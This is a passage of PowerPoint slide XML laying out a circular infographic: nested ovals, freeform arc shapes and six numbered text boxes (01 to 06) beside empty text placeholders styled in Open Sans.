        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>6-</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Oval 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB5211CD-52F0-BBA0-E685-3CDD5D8D2BB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3942393" y="1637105"/>
            <a:ext cx="4300518" cy="4300508"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C490B75F-CC3C-10F4-B350-B4254754C0B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036963" y="2736818"/>
            <a:ext cx="932827" cy="2101666"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2481199"/>
              <a:gd name="connsiteX1" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY1" fmla="*/ 209739 h 2481199"/>
              <a:gd name="connsiteX2" fmla="*/ 1040142 w 1101283"/>
              <a:gd name="connsiteY2" fmla="*/ 219070 h 2481199"/>
              <a:gd name="connsiteX3" fmla="*/ 207572 w 1101283"/>
              <a:gd name="connsiteY3" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX4" fmla="*/ 1040142 w 1101283"/>
              <a:gd name="connsiteY4" fmla="*/ 2262128 h 2481199"/>
              <a:gd name="connsiteX5" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY5" fmla="*/ 2271460 h 2481199"/>
              <a:gd name="connsiteX6" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY6" fmla="*/ 2481199 h 2481199"/>
              <a:gd name="connsiteX7" fmla="*/ 998309 w 1101283"/>
              <a:gd name="connsiteY7" fmla="*/ 2465483 h 2481199"/>
              <a:gd name="connsiteX8" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY8" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX9" fmla="*/ 998309 w 1101283"/>
              <a:gd name="connsiteY9" fmla="*/ 15715 h 2481199"/>
              <a:gd name="connsiteX10" fmla="*/ 1101283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1101283" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1101283" y="209739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1040142" y="219070"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="564995" y="316300"/>
                  <a:pt x="207572" y="736709"/>
                  <a:pt x="207572" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="207572" y="1744489"/>
                  <a:pt x="564995" y="2164899"/>
                  <a:pt x="1040142" y="2262128"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1101283" y="2271460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1101283" y="2481199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="998309" y="2465483"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="428575" y="2348898"/>
                  <a:pt x="0" y="1844798"/>
                  <a:pt x="0" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="636400"/>
                  <a:pt x="428575" y="132300"/>
                  <a:pt x="998309" y="15715"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1101283"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Freeform: Shape 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64771F16-24A0-1071-2298-8BC59D610384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6222211" y="2736818"/>
            <a:ext cx="932827" cy="2101666"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 2481199"/>
              <a:gd name="connsiteX1" fmla="*/ 102974 w 1101283"/>
              <a:gd name="connsiteY1" fmla="*/ 15715 h 2481199"/>
              <a:gd name="connsiteX2" fmla="*/ 1101283 w 1101283"/>
              <a:gd name="connsiteY2" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX3" fmla="*/ 102974 w 1101283"/>
              <a:gd name="connsiteY3" fmla="*/ 2465483 h 2481199"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY4" fmla="*/ 2481199 h 2481199"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY5" fmla="*/ 2271460 h 2481199"/>
              <a:gd name="connsiteX6" fmla="*/ 61141 w 1101283"/>
              <a:gd name="connsiteY6" fmla="*/ 2262128 h 2481199"/>
              <a:gd name="connsiteX7" fmla="*/ 893711 w 1101283"/>
              <a:gd name="connsiteY7" fmla="*/ 1240599 h 2481199"/>
              <a:gd name="connsiteX8" fmla="*/ 61141 w 1101283"/>
              <a:gd name="connsiteY8" fmla="*/ 219070 h 2481199"/>
              <a:gd name="connsiteX9" fmla="*/ 0 w 1101283"/>
              <a:gd name="connsiteY9" fmla="*/ 209739 h 2481199"/>
              <a:gd name="connsiteX10" fmla="*/ 0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0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="102974" y="15715"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="672708" y="132300"/>
                  <a:pt x="1101283" y="636400"/>
                  <a:pt x="1101283" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1101283" y="1844798"/>
                  <a:pt x="672708" y="2348898"/>
                  <a:pt x="102974" y="2465483"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="2481199"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2271460"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="61141" y="2262128"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="536288" y="2164899"/>
                  <a:pt x="893711" y="1744489"/>
                  <a:pt x="893711" y="1240599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="893711" y="736709"/>
                  <a:pt x="536288" y="316300"/>
                  <a:pt x="61141" y="219070"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="209739"/>
                </a:ln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Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF564999-4028-F127-73DE-1EC8EBD51862}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4875212" y="2566865"/>
            <a:ext cx="2441576" cy="2441570"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="2540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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1672429F-A9ED-A522-346B-0AE23F09AB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4948365" y="3030162"/>
            <a:ext cx="1917319" cy="1917315"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:alpha val="61000"/>
            </a:schemeClr>
          </a:soli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Freeform: Shape 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA3227B3-BD95-BE90-731E-9DFFB518A3F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="3844135" y="1496776"/>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98" name="Freeform: Shape 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB0F4B44-DB6D-3FF2-3798-FED9FD0CAE96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2985535" y="3178777"/>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99" name="Freeform: Shape 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7763E754-25C2-F945-410B-B474DBE6BD0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="3777828" y="4806702"/>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0" name="Freeform: Shape 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE99ED09-8C77-EAA7-36C8-3C1B98229212}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6281531" y="1496776"/>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1" name="Freeform: Shape 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFD73BA4-33DF-DD2B-3F55-03276AA9BACB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7153340" y="3178777"/>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3" name="Freeform: Shape 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{365162F2-8055-3F26-179F-3459303B0242}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6350352" y="4828879"/>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3" name="Oval 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4122EE06-83FE-D50E-3165-9B856BF15500}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5325458" y="3017108"/>
            <a:ext cx="1541087" cy="1541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79BB03C8-CD81-A9D2-E5F5-0096AD8D0700}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="4407250" y="1568196"/>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14" name="Freeform: Shape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5B063F3-D88E-0583-8509-5F1DFD8692B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21262495">
            <a:off x="4323404" y="1471383"/>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D5946D2-1ABA-FD81-BC53-2C4A32F6F291}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548650" y="3250197"/>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64" name="Freeform: Shape 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3BE71FC-74D8-7733-52D1-AA7780ECC49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3464804" y="3153384"/>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895DD4E-C180-8D91-45AF-F68C63B0F8A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="4340943" y="4878122"/>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77" name="Freeform: Shape 76">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990C9C7E-2A42-E821-4E57-32F48E0052E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="480315">
            <a:off x="4257097" y="4781309"/>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A55545A2-10A3-8F77-CB73-FC1B9183C931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6844646" y="1568196"/>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95" name="Freeform: Shape 94">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76240CB1-3538-F124-69D3-2809483F73FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="337505" flipH="1">
            <a:off x="6760800" y="1471383"/>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DF1F328D-70A3-44FC-BAEB-4D49E76A3533}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7716455" y="3250197"/>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91" name="Freeform: Shape 90">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA11B2E4-C0AE-E277-3E18-F2BD0F442544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7632608" y="3153384"/>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4B5F704D-088A-4D4B-4E45-B3A3BECC51EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6913467" y="4900299"/>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88" name="Freeform: Shape 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB029F4F-AC24-9B3D-B7B0-0E2177749B86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21187948" flipH="1">
            <a:off x="6829621" y="4803486"/>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B2843804-25DD-02D9-6A25-E6E15FD10119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046931" y="1851780"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="TextBox 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0643DADF-4A7D-FC97-9D2A-B6D820FEFB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7921225" y="3568285"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>02</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="TextBox 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105E72CE-ADFB-480D-3FC5-24C55CE8BDD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7119120" y="5196559"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>03</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="107" name="TextBox 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E2F2B49-E7F3-E816-8C1C-747C4CF61D95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4616552" y="1851780"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>06</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="TextBox 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCA2734-0741-BD30-D460-B1F35F40AD43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3742257" y="3568285"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>05</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="TextBox 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9749E8FD-228B-FA20-A9CF-56E850B4F645}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4544362" y="5196559"/>
            <a:ext cx="518091" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>04</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="112" name="Rectangle 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DCC6762-37B6-16F0-2134-95E16CA573A6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="1848418"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="113" name="Rectangle 112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72908926-F2EA-5E82-9816-9E38053E61F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="1412776"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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15" name="Rectangle 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59E54A3-A09C-A20F-AA90-572C7D5F8E80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="1848418"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Rectangle 115">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62DB9DA3-AB8F-0687-7E87-19A73F8C0EA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676642" y="1412776"/>
            <a:ext cx="2121395" cy="344414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="b">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>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18" name="Rectangle 117">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7396AD91-AEBE-6327-D0AF-60DE9D95671A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8393965" y="5470849"/>
            <a:ext cx="2121395" cy="480537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-IN" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
